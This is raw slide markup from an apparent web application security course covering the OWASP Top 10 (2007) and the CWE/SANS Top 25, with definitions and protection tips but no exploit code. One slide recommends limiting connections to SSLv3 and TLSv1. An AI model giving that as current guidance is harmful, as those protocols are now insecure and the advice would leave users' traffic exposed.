            <a:endParaRPr lang="en-US"/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265754"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="455613" indent="-256032" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 3"/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="571500" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>A1.	Cross-Site Scripting (XSS) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="455613" indent="-256032" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 3"/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="571500" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>A2.	Injection Flaws </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="455613" indent="-256032" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 3"/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="571500" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>A3.	Malicious File Execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="455613" indent="-256032" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 3"/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="571500" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>A4.	Insecure Direct Object Reference</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="455613" indent="-256032" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 3"/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="571500" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>A5.	Cross Site Request Forgery (CSRF)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OWASP Top 10 List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527B22-5A30-4F25-9EED-4943C341A77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4864116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Failure to encrypt network traffic leaves the information available to be sniffed from any compromised system/device on the network.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Switched networks do not provide adequate protection.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A9. Insecure Communications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D41585-16CC-44CE-A403-E3F71744C6B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110</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/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337192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SSL/TLS for ALL connections that are authenticated or transmitting sensitive information.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SSL/TLS for mid-tier and internal network communications between Web Server, Application and database.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Configure Desktop Clients and Servers to ensure only SSLv3 and TLSv1 are used with strong ciphers.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only valid trusted SSL/TLS certificates and train users to expect valid certificates to prevent Man-in-the-Middle attacks.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A9. Insecure Communications - Protection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800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65BB26-3A0D-4106-9494-378242C0023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111</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/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4864116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If the application sends sensitive data in clear text over the network, the data can be sniffed right off the wire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The attacker just needs control of one node in the network where the data is being transmitted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CWE-319: Cleartext Transmission of Sensitive Information </a:t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C88375-0F74-415B-97B8-AAD28054066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112</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US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000660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Encrypt data with a reliable encryption scheme before transmitting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SSL for the entire session from login to logout, not just for the initial page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CWE-319: Cleartext Transmission of Sensitive Information - Protection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800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DB3EA6-FF18-4BCD-B082-7C9D72E2CD2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113</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US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265754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sz="2400" b="1" u="sng" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>OWASP Definition:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Verdana" pitchFamily="34" charset="0"/>
              <a:buNone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	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Frequently, an application only protects sensitive functionality by preventing the display of links or URLs to unauthorized users.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Attackers can use this weakness to access and perform unauthorized operations by accessing those URLs directly.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400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A10. Failure to Restrict URL Access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329EE4-8DE4-4E80-B84F-2CE94C819D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114</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US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337192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When the application fails to restrict access to administrative URLs, the attacker can access normally unauthorized areas by typing in the URLs directly into the browser.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Surprisingly common, for example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="15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addAccountForm.aspx  - checks for admin access before displaying the form.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Form then posts to  addAcct.aspx  which does the work, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>but doesn’t check for admin privileges!</a:t>
            </a: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 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Consistent URL access control has to be carefully designed.</a:t>
            </a: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A10. Failure to Restrict URL Access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F0F183-F15A-40A0-8399-47835288636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115</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/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265754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Create an application specific security policy during the requirements phase.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Document user roles as well as what functions and content each role is authorized to access.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Specifying access requirements up front allows simplification of the design.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If your access control is not simple, it won't be secure.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A10. Failure to Restrict URL Access -  Protection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AB4CBF-11C9-499B-A099-F331527F2D0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116</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="727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ontent Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="1214422"/>
            <a:ext cx="9013825" cy="5000660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Critical resources used by the software are assigned permissions stating who are allowed to access the resources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These permissions need to be assigned properly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings 3" pitchFamily="18" charset="2"/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CWE-732: Insecure Permission Assignment for Critical Resource</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty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2EA357-9A68-499C-A66F-73BBA806227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117</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="768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1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1481138"/>
            <a:ext cx="9144000" cy="4927600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Check to see if the resource has insecure permissions when using a critical one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All configuration files, executables and libraries should be readable and writable to only system administrator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CWE-732: Insecure Permission Assignment for Critical Resource - Protection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty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FE0211-B5D4-4244-835A-EF8587F7FFE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118</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="778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337192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Application security starts with the Architecture and Design.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Security may not be added on later without re-designing and rewriting.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Custom code often introduces vulnerabilities.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Application vulnerabilities are NOT prevented by traditional network security controls.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Do not invent your own security controls.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Design, Design, Design. Code. Test, Test, Test.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"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071546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Summary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AB9E84-D3DB-4A25-AE15-BFA500F39B4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119</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/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265754"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="455613" indent="-256032" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 3"/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="571500" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>A6.	Information Leakage &amp; Improper Error Handling</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="455613" indent="-256032" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 3"/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="571500" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>A7.	Broken Authentication &amp; Session Management</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="455613" indent="-256032" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 3"/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="571500" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>A8.	Insecure Cryptographic Storage</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="455613" indent="-256032" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 3"/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="571500" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>A9.	Insecure Communications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="455613" indent="-256032" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 3"/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="571500" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>A10. Failure to Restrict URL Access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OWASP Top 10 List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527B22-5A30-4F25-9EED-4943C341A77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265754"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr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  <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.owasp.org</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="24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  <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://www.owasp.org/index.php/Top_10_2007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  <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>www.owasp.org/images/1/14/OWASP_Top_10_090708.ppt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References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D28FDE-D8DC-4975-A06B-425661B36D0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120</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/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429288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List of significant programming errors that can lead to serious software vulnerabilities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These are very dangerous as they are easy to exploit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They allow attackers to completely take over software, steal data or change course of action of a web application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List compiled and organized by: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cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>SANS Institute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cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>MITRE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cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Top software security experts in US and Europe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What Are Top 25 Programming Errors?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0AAEF9-D23E-4A2E-B761-DFF7AD6D970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89462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Raise awareness for developers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Empower customers who want more secure software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Provide a starting point for in-house software shops to measure their own progress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Why Do We Need Top 25?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E6870E-EB0C-4143-B3C5-362F7D6BE7A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337192"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/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595" dirty="0" smtClean="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Insecure Interaction Between Components</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="621792" lvl="1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ct val="68000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>These weaknesses are related to insecure ways in which data is sent and received between separate components, modules, programs, processes, threads or systems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="365760" lvl="1" indent="-256032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595" dirty="0" smtClean="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Risky Resource Management</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="621792" lvl="1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ct val="68000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>The weaknesses in this category are related to ways in which software does not properly manage the creation, usage, transfer, or destruction of important system resources</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="365760" lvl="1" indent="-256032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595" dirty="0" smtClean="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Porous Defenses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="621792" lvl="1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ct val="68000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>The weaknesses in this category are related to defensive techniques that are often misused, abused or just plain ignored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How Are Top 25 Categorized?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5209C1-9588-44EB-963A-7660BF6EEB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>
          <a:xfrm>
            <a:off x="0" y="850900"/>
            <a:ext cx="9144000" cy="55578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cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>CWE-20: Improper Input Validation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cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>CWE-116: Improper Encoding or Escaping of Output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cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>CWE-89: Failure to Preserve SQL Query Structure (aka 'SQL Injection')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cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>CWE-79: Failure to Preserve Web Page Structure (aka 'Cross-site Scripting')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cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>CWE-78: Failure to Preserve OS Command Structure (aka 'OS Command Injection')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cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>CWE-319: Clear text Transmission of Sensitive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857256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111" dirty="0" smtClean="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Insecure Interaction Between Components</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" smtClean="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4400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E46887-36F5-4933-8010-BE7074FCED8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>
          <a:xfrm>
            <a:off x="0" y="850900"/>
            <a:ext cx="9144000" cy="5221306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cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>CWE-352: Cross-Site Request Forgery (CSRF)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cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>CWE-362: Race Condition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cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>CWE-209: Error Message Information Leak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857256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111" dirty="0" smtClean="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Insecure Interaction Between Components</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" smtClean="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4400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E46887-36F5-4933-8010-BE7074FCED8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 idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="1000108"/>
            <a:ext cx="9013825" cy="5214974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CWE-119: Failure to Constrain Operations within the Bounds of a Memory Buffer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 CWE-642: External Control of Critical State Data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CWE-73: External Control of File Name or Path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CWE-426: Untrusted Search Path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CWE-94: Failure to Control Generation of Code (aka 'Code Injection‘)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lvl="1" algn="ctr" fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft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Category: Risky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Resource Management</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty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FF41AE-7BFA-4BFF-B605-476ED9CD409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 idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="1000108"/>
            <a:ext cx="9013825" cy="5214974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CWE-494: Download of Code Without Integrity Check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CWE-404: Improper Resource Shutdown or Release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CWE-665: Improper Initialization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CWE-682: Incorrect Calculation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lvl="1" algn="ctr" fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft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Category: Risky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Resource Management</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty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FF41AE-7BFA-4BFF-B605-476ED9CD409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149868"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="365760" indent="-256032" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc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What is Web Application Security ?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="365760" indent="-256032" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc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Why is it important ?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="365760" indent="-256032" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc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OWASP Top 10</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="621792" lvl="1" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc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Description of the vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="621792" lvl="1" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc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Examples</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="621792" lvl="1" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc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Protection ( Best Practice to avoid the vulnerability)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="24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What to Expect?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C5C1B6-3C88-43F4-B45F-F5CA8AD6B85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Content Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="1071546"/>
            <a:ext cx="9144001" cy="5337192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CWE-285: Improper Access Control (Authorization)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 CWE-327: Use of a Broken or Risky Cryptographic Algorithm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 CWE-259: Hard-Coded Password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 CWE-732: Insecure Permission Assignment for Critical Resource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 CWE-330: Use of Insufficiently Random Values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 CWE-250: Execution with Unnecessary Privileges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 CWE-602: Client-Side Enforcement of Server-Side Security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Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Porous Defenses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D0848A-7609-4E1B-9BA9-DFC6CE01A5F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4589462"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" u="sng" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>OWASP Definition</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> 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365125" lvl="1" indent="-255588">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc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dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>XSS flaws occur whenever an application takes user supplied data and sends it to a web browser without first validating or encoding that content.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="365125" lvl="1" indent="-255588">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc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dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>XSS allows attackers to execute script in the victim's browser which can hijack user sessions, deface web sites, possibly introduce worms,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A1.	Cross-Site Scripting (XSS)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7AC809-085E-4321-A43C-F4899D67982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63642"/>
            <a:ext cx="9144000" cy="5337192"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="666750" indent="-666750" fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="292929"/>
              </a:buClr>
              <a:buFont typeface="Wingdings 3"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Categories of XSS attacks:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="841375" indent="-590550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rgbClr val="292929"/>
              </a:buClr>
              <a:buSzPct val="140000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Stored </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Arial"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>- the injected code is permanently stored (in a database, message forum, visitor log, etc.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="841375" indent="-590550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rgbClr val="292929"/>
              </a:buClr>
              <a:buSzPct val="140000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Reflected</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Arial"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> – the web application does not store attack, just sends it back to whoever sent the request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="841375" indent="-590550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rgbClr val="292929"/>
              </a:buClr>
              <a:buSzPct val="140000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>DOM injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Arial"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> – Injected code manipulates sites JavaScript code or variables, rather than HTML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A1.	Cross-Site Scripting (XSS)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C134B5-3622-4309-86E9-747F980B526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1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26575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30000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="20000"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="292929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This is usually done when there is a location that arbitrary content can be entered into (such as an e-mail message, or free text field for example) and then referenced by the target of the attack.</a:t>
            </a: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ct val="20000"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="292929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The attack typically takes the form of an HTML tag (frequently a hyperlink) that contains malicious script (often JavaScript).</a:t>
            </a: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ct val="20000"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="292929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The target of the attack trusts the Web application and thus XSS attacks exploit that trust to do things that would not normally be allowed.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14298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A1.	Cross-Site Scripting (XSS)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2796DF-1614-4516-A54A-DD8D26EC647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OWASP Top 10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D5911F-76DC-4890-9650-C0A206F36A96}" type="slidenum">
              <a:rPr lang="en-US">
                <a:latin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latin typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21508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4"/>
            <a:ext cx="9144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Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>XSS-Attack: General Overview</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="29700" name="Picture 3" descr="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09800"/>
            <a:ext cx="857250" cy="9144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</p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="29701" name="Picture 4" descr="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5257800"/>
            <a:ext cx="857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5" descr="serv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2133600"/>
            <a:ext cx="730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981200" y="2133600"/>
            <a:ext cx="3276600" cy="1631950"/>
            <a:chOff x="1248" y="1344"/>
            <a:chExt cx="2064" cy="1028"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="29726" name="Line 7"/>
            <p:cNvSpPr>
